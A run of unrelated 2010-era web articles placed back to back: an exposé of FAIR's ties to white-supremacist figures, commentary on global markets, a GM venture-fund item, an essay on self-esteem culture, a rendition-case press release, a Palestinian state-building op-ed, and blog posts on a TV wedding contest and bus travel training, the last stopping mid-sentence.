And , in September 2002 , FAIR Eastern Regional Coordinator Jim Stadenraus participated in an anti-immigration conference on Long Island , N.Y. , with Jared Taylor .
Taylor is both a CCC member and the founder of the racist eugenicist publication , American Renaissance .
FAIR has also produced programming featuring hate group leaders linked to the CCC .
According to the anti-racist Center for New Community , FAIR's now defunct television production , " Borderline , " featured interviews with Taylor and Sam Francis , who edited the CCC 's newsletter until his death in 2005 .
Donald Collins , a member of both FAIR 's board of directors and its board of advisers , has his own ties to white supremacy .
Collins posts frequently to a hate website called Vdare.com , which is named after Virginia Dare ( said to be the first white child born in the New World ) and publishes the work of white supremacists and anti-Semites .
Collins also has been published in The Journal of Social , Political and Economic Studies , a periodical run by longtime academic racist Roger Pearson .
( Pearson founded the Eugenics Society in 1963 and worked with at least one former SS officer in England .
He is also the recipient of several Pioneer Fund grants . )
Several of Collins ' articles have attacked Catholics and their church for their pro-immigrant stances .
In one , he accused Los Angeles Archbishop Roger Mahony of selling out his country " in exchange for more temporal power and glory . "
Collins has also accused Catholic bishops of " infiltrating and manipulating the American political process " in order to undermine the separation of church and state .
Joe Guzzardi
Collins is not FAIR 's only link to the Vdare.com hate site .
Joe Guizzardi , a member of FAIR 's board of advisers , is the editor of Vdare.com .
He writes there frequently about how Latin American immigrants come to the United States in order to " reconquer " it — a conspiracy theory pushed by numerous hate groups .
Bad Press
By and large , FAIR has escaped negative publicity , generally being depicted as a mainstream critic of American immigration policy .
But there are exceptions .
In 2000 , FAIR ran ads opposing the reelection of Sen. Spencer Abraham ( R - Mich . ) , a Lebanese American who defeated Tanton in the primaries , because he had supported issuing more visas for immigrants with high - tech skills .
The ads featured side - by - side photos of Abraham and Osama bin Laden and this question : " Why is Senator Abraham trying to make it easier for terrorists like Osama bin Laden to export their war of terror to any city street in America ? "
The ads also accused the senator of pushing a bill that would " take American jobs .
Our jobs . "
The ads produced an immediate controversy , and a staunch conservative , Sen. Alan Simpson ( R - Wyo. ) , quit FAIR in protest .
Under attack , Stein insisted the ads were n't racist and later claimed that he'd thought Abraham was Jewish .
That same year , FAIR helped fund ads in Iowa that were rejected as " borderline racist " by the general manager of WHO - TV in Des Moines .
When the same ads appeared in Nebraska , Sen. Chuck Hagel , a Republican , lost his temper .
" The trash that this crowd puts out is just beyond terrible , " Hagel said .
Four years later in Texas , the Coalition for the Future of the American Worker — a FAIR front group designed to look like it represents labor interests — ran ads heavy on images of dark - skinned men loitering on corners and running from police cars .
One of the ad's prime targets , Rep. Martin Frost ( D - Texas ) , condemned the ads as racist .
His Republican challenger , Pete Sessions , found them so repugnant that he joined Frost in calling for them to be yanked off the air in their district .
In 2004 , FAIR made an extremely unusual criticism of a fellow nativist , a woman named Virginia Abernethy who had just joined the national advisory board of Protect Arizona Now ( PAN ) .
PAN , aided by some $ 600,000 from FAIR , had worked to collect signatures for a referendum ( which ultimately passed ) to require proof of citizenship when registering to vote or signing up for public benefits .
But as Election Day neared , newspapers trumpeted the revelation that PAN's new adviser was a self - declared " white separatist " who had long been active in the CCC .
FAIR reacted instantly with a pious press release denouncing " Abernethy 's repulsive views . "
The release left many scratching their heads — FAIR , after all , had CCC members on its payroll , and any number of other ties to the group .
Its own officials had in several cases endorsed similar separatist views .
And Tanton , FAIR 's founder and chief ideologue , was intimately familiar with Abernethy 's work .
After all , he had published her writings frequently in The Social Contract and his editor , Wayne Lutton , had shared the podium with Abernethy at forums of the CCC .
Whither FAIR ?
Following the defeat of the bipartisan immigration package this summer , FAIR flew into action one more time .
This time , it went after the DREAM Act , a widely supported , bipartisan bill that would have provided a path to citizenship for undocumented immigrant students accepted to college .
FAIR was the key advocate for its defeat and , sure enough , the DREAM Act finally died this October .
Is this the future for FAIR ?
Will journalists , politicians and the general public continue to take the organization and its nativist propaganda seriously ?
Dan Stein thinks so .
As he put it at FAIR 's 25th anniversary celebration in 2004 , just when the American nativist movement had begun to sense its own strength : " [ T ] oday , " he said , " as the country moves finally into a serious and realistic debate , the founders have created a mature and knowledgeable organization prepared to lead . "
IT 'S not quite a Lehman moment , but financial markets are more anxious today than at any time since the global recovery took hold almost a year ago .
The MSCI index of global stocks has fallen by over 15 % since mid-April .
Treasury yields have tumbled as investors have fled to the relative safety of American government bonds .
The three - month inter - bank borrowing rate is at a ten - month high .
Gone is the exuberance that greeted the return to growth ( see article ) .
Investors are on edge .
What lies behind these jitters ?
New nervousness about geopolitical risk , with tensions rising in the Korean peninsula , has not helped .
But that comes on top of two wider worries .
One is about the underlying health of the world economy .
Fears are growing that the global recovery will falter as Europe 's debt crisis spreads , China 's property bubble bursts and America 's stimulus - fuelled rebound peters out .
The other concerns government policy .
From America 's overhaul of financial regulation to Germany 's restrictions on short - selling , politicians are changing the rules in unpredictable ways ( see article ) .
And the scale of sovereign debts has left governments with less room to counter any new downturn ; indeed , many of them are being forced into austerity .
The danger is that these fears reinforce each other in a pernicious reversal of the dynamics of 2008 - 09 .
Then , co-ordinated government action on a grand scale stopped the global financial crisis from turning into a depression .
Now , thanks to incompetence and impotence , governments may become the problem that will drag the world economy down .
Do n't panic
That is far from inevitable .
Fears about the fragility of the global recovery are exaggerated .
Led by big emerging economies , the world 's output is probably growing at an annual rate of more than 5 % , far swifter than most seers expected .
This pace will , and should , slow , not least because the big emerging economies need to tackle rising inflation and possible asset bubbles .
China is in obvious danger , which is why its government has tried to constrain loans and property prices .
Pricking asset bubbles is never easy , but there is scant evidence that its efforts are too heavy - handed ( see article ) .
America 's growth may also slow as firms stop rebuilding their stocks and the government 's stimulus tapers off .
But the world 's biggest economy does not seem on the verge of a second recession .
For all their heavy debts , American consumers have returned to the shops .
Their confidence is rising as the economy is producing jobs ( albeit not enough of them ) .
And Congress seems likely to slow the pace of fiscal tightening with a new “ mini- stimulus ” of temporary spending ( see article ) .
Growth prospects look grimmest in Europe .
Yet even there the likely immediate outcome of the euro zone 's crisis is the enfeeblement of an already weak recovery , rather than a sudden slump .
The region 's profligate economies will struggle for longer as austerity kicks in .
But waning confidence will be mitigated by the boost that exports receive from the euro 's plunge .
Look only at those probable short - term prospects and it is hard to see why financial markets are suddenly in such a lather .
The reason is that the risks of a far worse outcome have risen , and those risks lie mainly with governments .
Grading the governments
The place with the wobbliest policy is Europe .
For the euro to survive , Europeans need to be prepared not just for painful fiscal adjustment but for profound structural reform as well .
Profligate governments , mostly in southern Europe , must become more prudent .
Uncompetitive economies must shake up their labour and product markets .
Countries that are running current - account surpluses , mainly in the north , must help , by avoiding overzealous belt - tightening and introducing reforms to encourage private spending .
And the European Central Bank ( ECB ) should counter the fiscal austerity with a looser monetary policy .
Reducing real wages in Spain would be easier if euro - zone inflation were higher .
Unfortunately , Germany 's government seems to be drawing exactly the opposite conclusions , promising to set an example with tough cuts when it should be helping to stimulate growth .
The worry is that , under German pressure , the ECB will have the same misguided tendency to toughness , condemning the euro area to years of stagnation .
Governments outside the euro zone are also at risk of drawing flawed conclusions , especially on exchange rates and fiscal policy .
China seems to think that the euro 's decline makes it less urgent to allow the yuan to appreciate .
The opposite is true .
With its biggest export market in a funk , China needs to accelerate the rebalancing of its economy towards domestic consumption , with the help of a stronger currency .
For much of the rich world , however , the most important consequences of Europe 's mess will be fiscal .
Governments must steer between imposing premature austerity ( in a bid to avoid becoming Greece ) and allowing their public finances to deteriorate for too long .
In some countries with big deficits , the fear of a bond - market rout is forcing rapid action .
Britain 's new government spelled out useful initial spending cuts this week .
But the emergency budget promised for June 22nd will be trickier : it needs to show resolve on the deficit without sending the country back into recession .
In America , paradoxically , the Greek crisis has , if anything , removed the pressure for deficit reduction , by reducing bond yields .
America 's structural budget deficit will soon be bigger than that of any other OECD member , and the country badly needs a plan to deal with it .
But for now , lower bond yields and a stronger dollar are the route through which American spending will rise to counter European austerity .
Thanks to its population growth and the dollar 's role as a global currency , America has more fiscal room than any other big - deficit country .
It has been right to use it .
The world is nervous for good reason .
Although the fundamentals are reasonably good , the judgment of politicians is often unreasonably bad .
Right now that is what poses the biggest risk to the world economy .
DETROIT  General Motors said Friday that it was committing $ 100 million to form its own venture capital firm as it seeks new technologies that can provide an advantage over competitors .
The subsidiary , known as General Motors Ventures , plans to invest in start - up companies working in a variety of fields , including renewable fuels , information and entertainment systems and advanced materials .
G.M. already has identified some potential targets and expects to announce its first investments soon , a spokeswoman , Sherrie Childers - Arb , said .
“ We are constantly looking for ways to deliver the best technology for our customers , ” Stephen J. Girsky , a G.M. vice chairman , said in a statement .
“ Our goal is to nurture these innovative technologies to help bring them to market , and to ensure our customers have access to the best technology available . ”
Jon Lauckner , who has been G.M. ’s vice president for global product planning , will oversee the venture capital effort starting July 1 , reporting to Mr. Girsky .
Are you REALLY worth it ?
Designer bags , luxury holidays even affairs - how celebrity culture is dangerously deluding women into think they deserve to have everything
Every time Cheryl Cole throws back her shining mane and twinkles , ' Because we 're worth it , ' a generation of women nod along in agreement .
Cheryl has just been voted our Woman Of The year , by Glamour Magazine .
Not only is she Tv gold , she 's had a number one hit , she 's in the most successful girl band ever , and she 's probably the most eligible single woman in Britain .
So perhaps it 's no wonder that we 're willing to believe whatever she tells us .
Cheryl may be talking about shampoo - but for many of us those four little words go a whole lot deeper .
Brought up in an age where self - help mantras have replaced old - fashioned concepts such as duty or self - sacrifice , and where , according to Oprah Winfrey , lack of self - esteem is ' the root of all the problems in the world , ' it 's no wonder we now believe we deserve the very best from life .
Eye opener :
It 's easy to assume that ' good self - esteem ' is the passport to a happy , successful life .
But compelling research proves quite the reverse
Once , the pinnacles of achievement were a good job or a happy home life .
Now , we 're encouraged to believe we 're entitled to everything we want , the moment we crave it , ' because we 're worth it . '
Want a £ 300 designer bag you can't afford ?
Go on - you deserve it .
Or that New york mini - break with the girls ?
Treat yourself - you 're fabulous .
Married women even admit to indulging in affairs , simply because : ' I was n't getting what I needed at home . '
Perhaps once , they'd have stuck it out , or sought counselling - but now , a ' cougar ' affair between an older woman and a hot younger man is simply their reward for staying married to the old dullard .
Surrounded by images of celebrities from ordinary backgrounds who have ' made it ' , we 're increasingly convinced that we 're no different from them .
We may not be hosting the breakfast news or singing to a packed O2 arena - but we work just as hard as they do , we tell ourselves , and we 're just as talented .
It 's easy to assume that ' good self - esteem ' is the passport to a happy , successful life .
But compelling research proves quite the reverse .
A major study from the London School of Economics found that excessively high self - esteem can be even more damaging than low self - worth .
Social psychologist Professor Nicholas Emler found that people with high self - esteem are more likely to hold racist attitudes , reject advice from friends and take risks such as drink - driving , as they believe they wo n't be caught .
' It 's worth remembering that high self - esteem is very far from being an unconditional benefit , ' warns Professor Emler .
Because you 're worth it : Cheryl may be talking about shampoo - but the advert 's catchphrase goes a whole lot deeper
' Our language contains many unflattering words to describe people with high self - esteem , such as " boastful " , " arrogant " , " smug " , " self - satisfied " and " conceited " .
' Perhaps we should be more willing to accept that very high self - esteem is as much a problem in need of treatment as exceptionally low self - esteem and be more open - minded about the benefits of moderation . '
Yet culturally , we 're constantly encouraged to assume that , as the song says , ' If I can dream it , I can be it ' .
Once , a truthful friend might have pointed out that it 's called ' a dream ' for a reason .
But now , simply ' having a dream ' is considered to be as valid as having a business plan and start - up funding .
TV shows overflow with ordinary folk who may possess a modicum of talent at cooking or singing , yet vibrate with evangelical zeal as they explain : ' I want this so badly , I know I can win . '
Self - awareness has been replaced by mindless self - belief , regardless of the evidence .
' We have fallen for a filtered - down pop psychology message that says : " If you believe it , it 's true , " ' says psychotherapist Rachel Morris , who specialises in women 's issues .
' Best - selling books such as The Secret basically say that if you want something badly enough , you can have it , and that 's a very seductive promise .
It 's basic , Californian - style positive thinking - but we 're now in danger of believing that high self - esteem is equivalent to talent , opportunity and ambition .
' Surely we only have to watch the deluded contestants on The X Factor , or Britain 's Got Talent , announcing , " Watch this space Simon Cowell , I 'll be back ! " to realise that the " I 'm worth it " culture is out of hand ? '
She adds : ' We 're constantly told by advertising , movies and the media that we , too , can " live the dream " however ordinary we may be . "
Being challenged , as people are on these shows , means you 're forced to question everything you believe about yourself - and it's easier to stay in a state of denial than face reality . '
This denial may also explain why women are still amassing mountainous debts .
Recent research from the Post Office revealed that more than a fifth of us lie to partners about the amount of debt we 're in .
On average , we owe £ 9,700 , ( outside of mortgages ) and 45 per cent of women explained their debt has been accrued by ' buying expensive fashions ' .
Having it all :
After six series of self - esteem - boosting , it 's no wonder married Carrie treats herself to kissing another man in Sex and the City 2
Despite the recession , we 're still ' treating ourselves ' simply because we feel we deserve it , regardless of whether we can afford it or need it .
' Deserving ' is quite an immature notion , ' observes Rachel Morris .
' Believing that because you 've had a tough day , you should have a reward , is based on a childish concept of having a pay - off for eating your greens . '
Genuine , fulfilling reward could be as simple as a cuddle from your child or a walk in the sunshine - but we 've been conditioned to believe that excitement , or material goods , are superior .
Having high self - esteem also means you 're more prepared to take risks - you 'll splash £ 400 on the shoes you can't afford because you assume you 'll get away with it .
Deep down , you believe you can not only have it all , but you deserve it all , too .
Maybe that 's why more married women than ever before are having affairs - and happily justifying them .
With excessively high self - esteem , concepts such as shame are no longer valid .
Instead , an affair is considered an appropriate response to ' not being appreciated ' in your relationship .
GOOD FOR YOU
The phrase self - esteem was coined in 1890 by U.S. philosopher and psychologist William James
A quick - fix ego massage is far more attractive than months of counselling and when we 're surrounded by images of celebrities cheating with someone glamorous , it 's only a short step to believing that we , too , deserve a ' better partner ' .
A recent women 's magazine survey found that 70 per cent of women regularly lie to their partners .
A fifth have had a long - term affair while married , while 30 per cent have had an affair with a married man .
In the past , most women were too embarrassed to admit to this type of behaviour .
Now , the prevailing attitude is , ' so what ?
I wanted to '.
Even the current number one box - office draw , Sex And The City 2 , shows Carrie , the designer - goods poster - girl for a generation , admitting ' something happened ' with her ex while her new husband was safely back in New York .
We 're not supposed to judge her for this ; we 're supposed to understand .
Big can be hard work !
Carrie deserves a little fun !
And after six series of having her self - esteem boosted by the likes of Samantha Jones , perhaps the most ' because I 'm worth it ' woman of all time , it 's no wonder she decides to treat herself .
But it 's not just our favourite movie characters who are cheering us on to grab what we want from life , regardless of the consequences .
Increasingly , books , TV shows and songs all promote the ' Go , Girlfriend ! ' school of thought , where self - belief is the holy grail of achievement .
Christina Aguilera 's huge hit , Beautiful , is the soundtrack for the L'Oreal Generation - the lyrics ' I am beautiful , no matter what they say . . . words can't bring me down . . . ' were written in response to bullying , but have since been co-opted as an anthem of iron - clad self - belief .
Alarming : 21 per cent of British teenagers are prepared to showcase their often meagre talents on The X Factor , Britain 's Got Talent or even Big Brother
Nowadays , we 're not obese ; we simply need to learn to ' love our curves ' .
And a man did n't leave because we were dull ; he just ' did n't appreciate our inner beauty ' .
Asking tough questions of oneself , a tenet of traditional psychotherapy - andreligion - has been abandoned in favour of an all - encompassing philosophy of ' love yourself and be who you want to be ' .
' The media often promotes the rise of the individual rather than the benefits of being part of a community , ' explains Surrey - based women 's therapist Evelyn Nathanson .
' As the world has got smaller , our role has become inward looking .
' We look less to each other for support and more to ourselves to promote
feelings of self worth . '
Basically , we 've learnt to take ourselves at our own , skyhigh , estimation .
Perhaps high self - esteem would n't be so bad if it did n't impact on others .
But affairs , debt and choices that put you first and your partner and children languishing somewhere down the list after a Mulberry bag and spa weekend can only harm your chances of long - term fulfilment .
And , worse still , we 're now raising a new generation to believe that attention adulation are the keys to happiness .
A recent survey for found that children under the age of ten believe being a celebrity is ' the best thing in the world ' , swiftly followed by ' good looks ' and ' being rich . '
SIXTIES BLUES
Self - esteem increases as we get older , but dips as we reach our 60s , says a recent poll
Of course , children are influenced by TV - but a mother who is spending the holiday budget on Botox may also contribute to their belief that they , too , deserve a world tour and a sports car by their 18th birthday .
Older children , too , are heavily led by ' I 'm worth it ' culture - 54 per cent of teenagers long to be famous , while just 12 per cent plan to tread the hard - work route to becoming a lawyer or doctor .
Meanwhile , 21 per cent of British teenagers are prepared to showcase their often meagre talents on The X Factor , Britain 's Got Talent or even the faded , pier - end freak - show of Big Brother , whose final series has just started on Channel 4 , introducing yet more eager fame - seekers for their 15 minutes .
Inevitably , they 'll be doomed to disappointment - but that wo n't stop them .
They 'll simply reject any criticism , because the judges or the public are just trying to ' bring them down ' .
And to the L'Oreal generation , that 's a cardinal sin .
Surely it 's time to wake up , and realise our sense of entitlement is just that - a sense , not a reality .
And that true fulfilment requires hard work , self - awareness , and a realistic appraisal of our own flaws .
' High self - esteem is more akin to vanity , ' says Rachel Morris .
' I do n't believe someone with a realistic sense of their own worth feels the need to buy things they can't afford or put their family 's happiness at risk .
There 's a genuine value in being loved the way you want , feeling safe in your home , being able to provide what your children need .
But achieving that is far harder than buying a bottle of expensive perfume . '
The truth is , none of us is automatically entitled to anything - we can achieve it , through hard work , being loveable , making the most of what we have .
But the world does n't owe us a thing .
Whatever Cheryl may tell us , it 's just a slogan to sell shampoo , not a justification for having anything we want .
Macedonia Challenged for Complicity in Wrongful Abduction
NEW YORK , June 14 / PRNewswire -USNewswire / --
The European Court of Human Rights will consider the case of a German citizen who was kidnapped and beaten in connection with the CIA 's extraordinary rendition program , the Open Society Justice Initiative revealed today .
This is the first time an extraordinary rendition case related to the " war on terror " has reached Europe 's top court .
Macedonian security forces seized Khaled El - Masri at the request of the United States in December 2003 and held him — incommunicado — for 23 days .
El - Masri was then handed over to the CIA and flown to a detention center in Kabul , Afghanistan , where he was confined in appalling conditions , interrogated , and abused .
After several months , El - Masri was finally released and dumped on a roadside in Albania .
Despite overwhelming evidence of its collaboration , Macedonia has denied that El - Masri was detained illegally on its territory or handed over to the CIA .
" European governments must be held accountable for participating in torture , abuse , and kidnappings in association with the CIA 's rendition program , " said James A. Goldston , executive director of the Open Society Justice Initiative , which is litigating the case .
" United States courts may have closed their doors on this matter , but we hope that El - Masri will find justice before the European Court . "
As with rendition survivor Maher Arar , the U.S. Supreme Court has refused to hear El - Masri 's case .
The U.S. government asserted the " state secrets privilege " when challenged in the United States , which resulted in the case 's dismissal .
The United States has yet to publicly acknowledge El - Masri 's rendition .
He has never been charged with a crime or given any explanation for his treatment .
" Official recognition of what happened is essential for survivors like El - Masri , who are trying to deal with this traumatic experience and move on with their lives , " said Rupert Skilbeck , Justice Initiative litigation director .
" Khaled El - Masri has a right to public acknowledgement of the injustice he has suffered , and the people of Europe have a right to know the truth about how their governments colluded with the CIA . "
In May , the Open Society Justice Initiative sent a letter to U.S. Secretary of State Hillary Clinton , requesting that the U.S. government publicly confirm that it wrongly rendered El - Masri , as well as provide , in light of its observer status with the Council of Europe , any assistance sought by the European Court .
The Justice Initiative also wrote to German Chancellor Angela Merkel , asking her to confirm that the United States government has privately acknowledged its error in El - Masri 's case , as was widely reported in 2005 .
The letter encouraged Germany to consider intervening in the case on El - Masri 's behalf .
Secretary Clinton has not responded to the Justice Initiative to date .
The German government replied , referring the Justice Initiative to a transcript of Merkel 's previous remarks , in which she acknowledged that the U.S. privately admitted to having wrongfully detained El - Masri .
The Open Society Justice Initiative uses law to protect and empower people around the world .
Through litigation , advocacy , research , and technical assistance , the Justice Initiative promotes human rights and builds legal capacity for open societies .
SOURCE Open Society Justice Initiative
While No One ’s Looking , the Palestinians Are Building a State
In the world of Palestinian politics , the recent weeks have been a study in contrasts .
The international media has trained its focus off the shores of Gaza , where the flotilla fiasco has generated dramatic images of dead civilians and battered Israeli soldiers .
The politics of this incident reflect the traditional sturm und drang of the Palestinian national movement : full of grand gestures and transformative ambitions that might result in bloodshed and embarrassment for Israel , but make no substantive contribution to Palestinian liberation .
But in Bethlehem , far away from the television cameras and breathless news reports , 2,000 Palestinian financiers also gathered recently at the second Palestine Investment Conference to quietly go about the business of building the economy of a viable Palestinian state .
They discussed almost $ 1 billion in new projects targeting high - growth sectors , including information and communications technology , housing , and tourism .
The politics of the conference represent a paradigm shift quietly taking place in the West Bank under the leadership of Palestinian Authority President Mahmoud Abbas and Prime Minister Salam Fayyad , in which Palestinians are increasingly turning to the mundane , workaday tools of governance and development as their principal strategy for ending the occupation .
This strategic transformation is the result of a conundrum facing the Palestinian leadership , which has gambled its political future on a two - state agreement with Israel .
If they fail , it is likely that both the Palestine Liberation Organization ( PLO ) and the Palestinian Authority ( PA ) will permanently fade from history and the national movement will be captured by Islamists led by Hamas .
Even PLO leaders , however , are still extremely skeptical about the ability of diplomacy to yield significant short - term progress , given the hard - line attitude of Israeli Prime Minister Benjamin Netanyahu ’s government .
Therefore , Palestinians have gravitated toward solutions that avoid exclusive reliance on diplomacy , which depends on American determination and Israeli seriousness , or slipping back into counterproductive , self - defeating violence .
The most important of these initiatives is the state - and institution - building program adopted by Fayyad ’s cabinet last August .
This program marks an attempt to build the administrative , infrastructural , and economic framework for a Palestinian state — not only in spite of the occupation , but as a means of confronting it .
The plan calls for every PA ministry to meet a series of administrative and institutional goals , from economic and infrastructural developments to good governance and transparency measures .
A budget document released in January added even more details to the program .
The idea is that , if you build the state , it will come .
Palestinian nationalism had previously been conceived of as largely a top - down affair , concerned with success on the battlefield or at the highest levels of international diplomacy .
But rather than seeking an impossible military victory or waiting for the sudden achievement of a major peace treaty , the state - building program seeks to create Palestine as a practical reality .
Even as they continue to insist on their moral right of self - determination , Palestinians are seriously taking up their practical responsibilities of self - government .
Palestinians have also adopted nonviolent tactics designed to confront the occupation — particularly the PA ’s boycott of settlement goods and mass protests against abusive occupation practices , such as the West Bank separation barrier .
These tactics are designed to ensure that both Israelis and Palestinians understand that the state - building approach is not , as is sometimes claimed , a form of collaboration or " beautifying " of the occupation , but rather a sophisticated form of resistance to it .
This approach also seeks to achieve clarity on the status of the occupied territories and confront Israelis with a simple question :
Is this land going to be part of our state , or is it a part of yours ?
This strategy is making quiet but significant progress .
Last year , the PA completed more than 1,000 community development programs .
It has created the nucleus of a Palestinian central bank and developed a transparent and accountable system of public financing .
Hundreds of major development and public - private initiatives are under way , including at least two major telecommunications companies and the first planned Palestinian city .
With significant international support , the framework of the Palestinian state is starting to take shape before our eyes .
The bedrock of the state - building program is the new security services trained by multinational forces Palestinians have deployed 2,600 officers in five major West Bank cities , ensuring unprecedented levels of law and order and facilitating the removal of a number of Israeli checkpoints .
Israelis themselves have commended the effectiveness of the forces and praised their security coordination with Israeli forces .
The combination of security improvements , increased access and mobility for Palestinians , and the PA ’s economic development projects led to a growth rate of 8.5 percent in the West Bank last year , one of the highest in the recession - plagued world economy .
Perhaps even more significantly , about half of the PA ’s budget is now provided by Palestinian taxes and not international support .
In addition to this paradigm shift in the West Bank , Palestinian diplomacy is finally back on track after a difficult 12 months .
Abbas ’s June 9 visit to the White House revealed that the PLO is presenting itself , for the first time in many years , as a real political partner to the United States .
Abbas was able to achieve broad agreement with President Barack Obama ’s administration on most key points , including the necessity of easing the siege of Gaza without benefiting Hamas and reaching an agreement that , though direct Israeli - Palestinian talks are important , more political and diplomatic preparation is still required before they can be launched .
There have been some significant failures , of course , particularly regarding the problem of Hamas ’s grip over Gaza .
Hamas stymied plans to hold national elections in January and July , which represented the only viable peaceful option for reunifying the Palestinian national movement .
For the foreseeable future , therefore , national reconciliation appears to be a slogan rather than a practical possibility .
The PLO and Hamas currently agree on absolutely nothing , from how to deal with Israel to the cultural and religious foundations of Palestinian society .
The future of Hamas will likely be determined by the success or failure of the PA ’s state - building project , and its diplomatic efforts .
A decisive failure of the new Palestinian tactics will probably make an Islamist takeover inevitable , but its success will discredit Hamas and weaken the organization ’s appeal .
The recent Gaza flotilla disaster and Israel ’s unconscionable and counterproductive blockade of humanitarian aid to the people of Gaza poses a significant challenge to the PA ’s strategy .
In the coming months , its leadership will attempt to deny Hamas the ability to reap political benefits from Gazans ’ suffering .
Particularly after Israel ’s bloody attack on the flotilla , PLO leaders are determined to help find a way to ease the siege without strengthening their rivals .
They think that the blockade has primarily strengthened Hamas ’s grip on power in Gaza and are calling for a new way to separate the interests of Hamas and ordinary Gazans .
Palestinian strategy must contend not only with the fallout from the flotilla debacle , but with the constant stresses imposed by the occupation ’s continued restrictions on Palestinian economic development and the meager progress of diplomatic negotiations .
Recent World Bank and IMF studies confirm that , though the institution - building project is meeting its stated objectives , under present conditions it can only go so far :
The occupation must continue to recede for it to develop further .
This means that increased Israeli cooperation is essential .
The PA ’s state - building approach and its nonviolent tactics are means for achieving progress on the ground , but in the end they cannot be a substitute for a negotiated agreement .
Although the flotilla fiasco and international outrage concerning Gaza may be more dramatic , all parties have an interest in ensuring the success of the groundbreaking developments in the West Bank .
International support and Israeli cooperation are essential for this project to realize its full potential .
If that happens , the creation of a viable Palestinian state might attract more than a few newspaper headlines of its own soon enough .
Peste 300 de interviuri video cu artiști și producători culturali
Formare Culturală - platform ă de resurse
20 de minute de celebritate , ascult ă
Box 3 DVD , 3 minute de celebritate , 81 de filme
Categories Categories Select Category 100 ARTISTI ( 48 ) 24 / SECOND ( 14 ) ARCHITECTURE ( 267 ) ART FAIRS ( 15 ) ART MAP (1 ) ART TERAPIE ( 171 ) Arte Grafice & BD ( 35 ) ARTIST OF THE MONTH ( 86 ) BIENNALES ( 135 ) Bucharest Biennale 2010 ( 11 ) Bucharest Biennale 2012 ( 6 ) Lyon Biennale 2011 ( 4 ) Moscow Biennale 2011 ( 9 ) Venice Art Biennale 2011 ( 51 ) Venice Art Biennale 2013 ( 28 ) CARTOON ( 311 ) CONCURS ( 161 ) CRITIC POINT ( 164 ) EDUCATIE ( 72 ) EXPO OF THE WEEK ( 660 ) FAKE IT OR NOT ( 9 ) FORUMUL DIVERSITATII CULTURALE ( 36 ) GALLERY TALK ( 700 ) HOME MADE ART ( 563 ) HOT ( 89 ) Istoria artei in imagini ( 307 ) Jurnal vizual ( 39 ) MICA PUBLICITATE (1 ) MODERNISM ART DOCUMENTARIES ( 136 ) NEWS ( 14,138 ) NO COMMENT ( 685 ) NUD ism ( 579 ) Patrimoniul viitorului ( 17 ) PHOTO OF THE DAY ( 1,984 ) Q&A ( 86 ) Radio ISM ( 101 ) ROMANIAN EXPORT ( 671 ) SECRET MUSEUMS ( 394 ) SHOW ME THE MONEY ( 182 ) Bani europeni ( 1 ) Bani privati ( 3 ) Bani publici ( 4 ) Strategia cultural ă și creativă a Bucureștiului ( 3 ) STREET ART ( 281 ) TINERETE FARA BATRANETE ( 33 ) Tineri și neînfricați ( 21 ) VIDEO ISM ( 212 )
« Go back a post || Return to G - A - Y homepage || Haul tail to next post »
06/30/2010
Today 's Wedding : Yesterday 's labels
by Jeremy Hooper
There 's nothing in the Today Show 's eligibility requirements that stipulates the couple who they ( with the help of America ) choose to marry on national television has to be male / female .
In fact , when the question arose a few years back , producers made it clear that same - sex couples were indeed eligible for their A.M. contest .
So assuming that 's still the case in 2010 : Yay , progress !
Especially now that ( a ) TODAY producers can throw a legally - binding same - sex soiree just a short drive away from their NY studio ( CT being the closest by far ) or right outside the door of their D.C. bureau , and ( b ) Kathie Lee and Hoda 's presence will ensure that the open bar will be flowing .
However , we are somewhat troubled to see that on the very first page of this year 's application form , one half of any same - sex couple who should apply for the chance to have the world 's best wedding video is forced to lie about their gender in order to fit into the heterosexist box :
Today 's Wedding : Modern .
Love Application [ Facebook ]
Now , as someone who 's been through the marriage process , I know firsthand that this is not an anomaly .
Many of my own vendors handed me forms that required either me or them to draw lines through the word bride in order to fit my and my then - fiancé 's legal reality .
So I do n't want to imply that TODAY is some big , bad homo - hostile outlet that stands apart from the wedding industry writ large .
Many well - intentioned people are trying to catch up , some of them waiting for that one " Aha ! " moment that 'll forever open their eyes to the casual exclusivity they 'd been fostering .
But this is not some mom and pop flower shop : TODAY is a particularly high profile outlet .
America 's number one morning show .
Countless people will surely apply for this contest -- it'd be nice for the show to provide a benignly teachable moment here , so that their " modern.love " contest will truly keep up with the times .
**UPDATE : GLAAD joins us on this : Today Show Wedding Contest Application Needs an Update to Include Same - Sex Couples [ GLAAD Blog ]
****
* UPDATE , 7/1 : Turns out we were too generous with our assumptions .
It turns out that " Today " is not allowing gay couples this year .
The couple must be able to legally marry in NY state ( where same - sex marriage is recognized but not performed ) : Today Show Wedding Contestants Must Be Able to Legally Marry in New York [ GLAAD ]
*** UPDATE , 7/8 : VICTORY !
Your thoughts
Please enable JavaScript to view the comments powered by Disqus .
Disqus
G - A-Y Comments Policy
A Transit Education in Santa Rosa
Introducing students to the awesomeness of bus travel .
( Photo : Santa Rosa CityBus )
I started riding the public bus
to get to school in New York City when I was about nine or ten years
old .
It was a trip that took half an hour or so each way , including a
walk of several blocks from the bus stop to the school door .
Even though I had been riding the bus with my parents since I was
very little , I can still remember the nervousness I felt about making
the trip on my own for the first time .
Would I recognize my stop in
time ?
Would I be able to pull the signal cord to get the driver ’s
attention ?
What if I went too far ?
I can also remember the sense of pride and freedom I felt when the
trip went smoothly .
And my excitement at the realization that I could
take the bus not just to school , but to a friend ’s house , or to the
bookstore I loved way downtown .
My world had opened up , all because of a
bus system .
So a recent post from Streetsblog Network member blog Santa
Rosa CityBus about kids learning to ride the bus caught my eye .
This California city has a program to educate groups in the ways of the
bus system :
Santa Rosa CityBus offers FREE travel training classes for groups
who want to have someone help them learn our transit system in " real
time " .
This service is generally used by seniors , students and those who
have mobility challenges .
Santa Rosa CityBus was contacted by
teachers from both Santa Rosa High School and Slater Middle School who
wanted their students to learn how to use public transit .
Both
instructors realize that knowing how to read and understand the system
route map and time schedule is a very valuable life skill and more than
worth taking the time to learn .
So last week , 39 Santa
Rosa students and 8 school staff members were treated to a
comprehensive , hands - on training program .
CityBus staff met the students
at their schools and started the training by providing a general
introduction to Santa Rosa CityBus , including helpful information on
fares , bus tickets , monthly passes and transfers .…
Feedback from
students is always very positive .
They really enjoy the class and , as a
result , feel confident to use Santa Rosa CityBus to travel around town .
In a way , it strikes me as too bad that the kids ca n’t learn how to
use the bus from parents and other family members , the way that I did .
But the reality of many American cities is that no one in the family
uses anything but a car for transportation .
I have plenty of grown - up
friends from other parts of the country who are intimidated by using
public transit in their own cities or any other .
So I think it ’s great
